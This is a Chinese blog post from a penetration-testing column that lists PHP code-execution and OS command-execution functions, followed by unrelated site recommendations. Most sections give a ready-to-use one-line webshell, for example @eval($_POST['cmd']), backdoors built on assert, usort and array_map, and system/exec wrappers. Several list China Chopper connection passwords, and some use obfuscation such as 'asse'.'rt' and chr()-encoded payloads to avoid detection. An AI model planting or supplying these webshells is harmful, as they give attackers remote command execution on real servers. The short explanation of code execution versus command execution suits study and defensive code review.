PHP-代码执行函数-命令执行函数

最新推荐文章于 2024-04-23 16:20:32 发布
最新推荐文章于 2024-04-23 16:20:32 发布
阅读量6k 收藏 55
点赞数 13
分类专栏: 渗透测试 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47112073/article/details/127440686
版权

目录

代码执行函数:

1.eval()函数

2.assert()  函数

3.call_user_func()函数

 4- create_function()函数

 5- array_map()函数

6- call_user_func_array() 函数

7- array_filter()函数

8、usort()、uasort() 函数

9- preg_replace() 函数

 命令执行函数

1- system()函数

 2-passthru()函数

3- exec()函数 

 4- shell_exec()函数

 5- popen()/proc_open()函数

6- 反引号 ``函数 

 代码执行与命令执行区别

代码执行与命令执行的不同:

代码执行函数:

主要有(9个):eval(),  assert(),  call_user_func(),  create_function(), array_map() call_user_func_array(), array_filter(), uasort(), preg_replace()

1.eval()函数

eval() 函数把字符串按照 PHP 代码来计算

命令执行:cmd=system(whoami);



<?php @eval($_POST['cmd']);?>

注意这里是POST,所以以火狐的插件HackBar作实验:

 

2.assert()  函数

与eval类似,assert函数是直接将传入的参数字符串当成PHP代码直接

    命令执行:cmd=system(whoami)

    菜刀连接密码:cmd



<?php @assert($_POST['cmd'])?>

 

3.call_user_func()函数

函数的第一个参数是被调动的函数,剩下的参数(可有多个参数)是被调用函数的参数,
也可以这么说传入的参数作为assert函数的参数

    命令执行:cmd=system(whoami)

    菜刀连接密码:cmd



<?php call_user_func("assert",$_POST['cmd']); ?>

<?php
call_user_func($_POST["fun"],$_POST["para"])
?>
//post:fun=assert&para=phpinfo();

 

 

 

 4- create_function()函数

创建了一个匿名函数,如果没有严格对参数传递进行过滤,
攻击者可以构造特殊字符串传递给create_function()执行任意命令。

创建匿名函数执行代码
执行命令和上传文件参考eval函数(必须加分号)。
<?php $func =create_function('',$_POST['cmd']);$func(); ?>

 

<?php
$a= $_POST['func'];
$b = create_function('$a',"echo $a");
$b('');
?>
//post:func=phpinfo();

 

 

 5- array_map()函数

array_map() 函数
将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。
回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。
    命令执行http://localhost/123.php?func=system   cmd=whoami
    菜刀连接http://localhost/123.php?func=assert   密码:cmd
<?php
    $func=$_GET['func'];
    $cmd=$_POST['cmd'];
    $array[0]=$cmd;
    $new_array=array_map($func,$array);
    echo $new_array;
?>

 

6- call_user_func_array() 函数

将传入的参数作为数组的第一个值传递给assert函数
    cmd=system(whoami)
    菜刀连接密码:cmd
<?php
    $cmd=$_POST['cmd'];
    $array[0]=$cmd;
    call_user_func_array("assert",$array);
?>

 

7- array_filter()函数

用回调函数过滤数组中的元素:array_filter(数组,函数)
    命令执行func=system&cmd=whoami
    
<?php
    $cmd=$_POST['cmd'];
    $array1=array($cmd);
    $func =$_GET['func'];
    array_filter($array1,$func);
?>

 

8、usort()、uasort() 函数

usort() 通过用户自定义的比较函数对数组进行排序。

uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联 。

php环境>=<5.6才能用
    命令执行:http://localhost/123.php?1=1+1&2=eval($_GET[cmd])&cmd=system(whoami);
    
<?php
    usort($_GET,'asse'.'rt');
?>

 

9- preg_replace() 函数

preg_replace('正则规则','替换字符','目标字符')
执行命令和上传文件参考assert函数(不需要加分号)。
将目标字符中符合正则规则的字符替换为替换字符,此时如果正则规则中使用/e修饰符,则存在代码执行漏洞。
<?php
    preg_replace("/test/e",$_POST["cmd"],"jutst test");
?>
这里可以使用chr()函数转换ASCII编码来执行代码。
 
#phpinfo();
eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))

 

 

 命令执行函数

主要有(7个):system(), passthru(), exec(), shell_exec(),popen()/ proc_popen(),反引号 ``

1- system()函数

作用
将字符串作为OS命令执行,自带输出功能。
<?php system($_POST["cmd"]);?>

 

 2-passthru()函数

作用
将字符串作为OS命令执行,不需要输出执行结果,且输出全部的内容。
<?php passthru($_POST["cmd"]);?>

 

3- exec()函数 

作用
将字符串作为OS命令执行,需要输出执行结果,且它只会输出最后一行的内容。
<?php echo exec($_POST["cmd"]);?> 

<?php print exec($_POST["cmd"]);?>    //他的输出结果需要打印,system()不用打印

 

 

 4- shell_exec()函数

 

作用
将字符串作为OS命令执行,需要输出执行结果,且输出全部的内容。
<?php echo shell_exec($_POST["cmd"]); ?>

<?php print shell_exec($_POST["cmd"]); ?>

 

 5- popen()/proc_open()函数

作用
该函数也可以将字符串当作OS命令来执行,但是该函数返回的是文件指针而非命令执行结果。
该函数有两个参数。

<?php
    $cmd = $_POST['cmd'].">> 1.txt";
    //此时的$cmd=ipconfig >> 1.txt
    popen("$cmd",'r'); //实际上就是 popen("ipconfig >> 1.txt", "r"),
把执行结果放入1.txt文件,通过访问1.txt文件查看执行结果。
 
?>

 

 

6- 反引号 ``函数 

作用
[``]反引号里面的代码也会被当作OS命令来执行
<?php echo `whoami`?>

或者:

<?php $cmd = $_GET['cmd'];print `$cmd`; ?>

 

 

 

 代码执行与命令执行区别

代码执行与命令执行的不同:

代码执行本质上是调用后端语言(PHP,JAVA……)来执行特定代码,而命令执行本质是调用系统的命令执行的接口,

命令执行漏洞是可以直接调用操作系统命令,代码执行漏洞是靠执行脚本代码调用操作系统命令

参考为:

PHP中常见的命令执行函数与代码执行函数-红烧兔纸的博客

大风呼呼的
关注
  • 13
    点赞
  • 55
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP执行代码函数有哪些,PHP代码执行函数总结
weixin_39586526的博客
03-24 1660
PHP中可以执行代码函数,常用于编写一句话***,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。常见代码执行函数,如eval()、assert()、preg_replace()、create_function()array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()文件操作函数、动态函数...
php assert执行命令,php代码执行&&命令执行函数
weixin_33603963的博客
03-19 2191
一、PHP代码执行函数1、eval()函数#传入的参数必须为PHP代码,既需要以分号结尾。#命令執行:cmd=system(whoami);#菜刀连接密码:cmd那么当我们上传了eval函数的菜刀马之后,在连接不上菜刀的情况下怎么上传大马呢?继续往下看这里我是先写一个上传马,再用上传马去上传大马,有点多次一举,但是考虑到大马代码量太多,还是建议先写个上传马,以下代码只有1kb。@$temp = $...
Python 执行字符串表达式函数(eval exec execfile)
12-25
仔细研读后学习了三个函数: eval:计算字符串中的表达式 exec:执行字符串中的语句 execfile:用来执行一个文件 需注意的是,exec是一个语句,而eval()和execfile()则是内建built-in函数。 Python 2.7.2 (default, Jun 12 2011, 15:08:59) [MSC v.1500 32 bit (Intel)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> x=1 >>> print eval("x+1") 2
PHP执行linux命令6个函数代码实例
01-19
一般情况下,很少会用php执行linux命令,不过特殊情况下,你也许会用到这些函数。以前我知道有二个函数可以执行linux命令,一个是exec,一个是shell_exec。其实有很多的,结合手册内容,介绍以下6个函数。 1,exec函数 <?php $test = “ls /tmp/test”; //ls是linux下的查目录,文件的命令 exec($test,$array); //执行命令 print_r($array); ?> 返回结果如下: [root@krlcgcms01 shell]# php ./exec.php Array ( [0] => 1001.l
【C语言】C语言执行命令
数字人生
03-14 1093
在C语言编程中,执行命令通常是通过调用库函数完成的。
PHP 执行系统命令函数
cheers_bin的博客
04-04 3924
PHP命令执行函数有很多,最常见的有以下几种: 1、system string system(string command,int &return_var) 可以用来执行系统命令并将相应的执行结果输出 2、exec string exec(string command,array &outpub,int &return_var) command是要执行命令,output是获得执行命令输出的每一行字符串,return_var存放执行命令后的状态值。 注意:exec输出的是命令执行结果
PHP常见的命令执行函数代码执行函数
dys的博客
06-23 4339
命令执行代码执行
php 执行命令函数
热门推荐
03-31 16万+
哈尔滨洛弘科技有限公司 php 执行命令函数合集
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
siu~
10-25 653
1、RCE-原理-代码执行&命令执行 2、RCE-黑白盒-过滤绕过&不回显方案
PHP执行外部命令函数盘点
xiaoweids的博客
06-04 275
system()输出并返回最后一行shell结果。exec()不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。passthru()只调用命令,把命令的运行结果原样地直接输出到标准输出设备上...
php执行系统命令函数及防御
m0_52920608的博客
07-17 557
php命令执行函数
PHP中如何判断exec函数执行成功?
12-19
做一个代码发布的系统,需要用到PHP的exec函数执行Linux下的命令和git,svn命令,如何判断PHP的exec函数是否执行成功呢? 解决方案 写个PHP文件来做实验: exec函数第一个参数是执行命令,第二个参数是执行的...
php代码审计之命令注入(3)
01-09
文章目录system()命令:exec():passthru(...这个函数会将结果直接进行输出,命令成功后返回输出的最后一行,失败 返回FALSE system.php源码如下: <?php $action = $_GET['cmd']; echo ;
PHP执行系统外部命令
01-21
PHP和其它的程序设计语言一样,完全可以在程序内调用外部命令,并且是很简单的:只要用一个或几个函数即可。 前提条件 由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给...
PHP执行cmd命令的方法
01-20
文件中配置safe_mode参数支持命令执行的方法,有需要的朋友参考下。 说明: 本节内容在wamp包安装的环境实现。 首先,打开php.ini,关掉安全模式safe_mode = off,然后在看看 禁用函数列表 disable_functions = proc...
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 472
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 775
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
bugku ezbypass
m_de_g的博客
04-23 191
bugku ezbypass $++,$_++
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
最新发布
wyqshusan的博客
04-23 539
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实时导航、实时错误检查和代码重构等实用功能。在新版本中,PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其中包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
php sql语句过滤
05-24
为了避免 SQL 注入攻击,需要对用户输入的 SQL 语句进行过滤。以下是一些常见的过滤方法: 1. 使用 PHP 内置的函数进行过滤,如 mysqli_real_escape_string()、PDO::quote() 等。 2. 使用参数化查询(prepared statements)来执行 SQL 语句,这可以有效地防止 SQL 注入攻击。 3. 对于特殊字符,可以使用 addslashes() 函数进行转义。 4. 对于数字类型的数据,需要使用 is_numeric() 函数进行验证。 5. 对于字符串类型的数据,需要使用 ctype_alpha()、ctype_digit() 等函数进行验证。 6. 尽量避免使用动态拼接 SQL 语句的方式,而是使用预定义的 SQL 语句模板。 总之,要保证 SQL 语句的安全性,需要从多个方面来进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值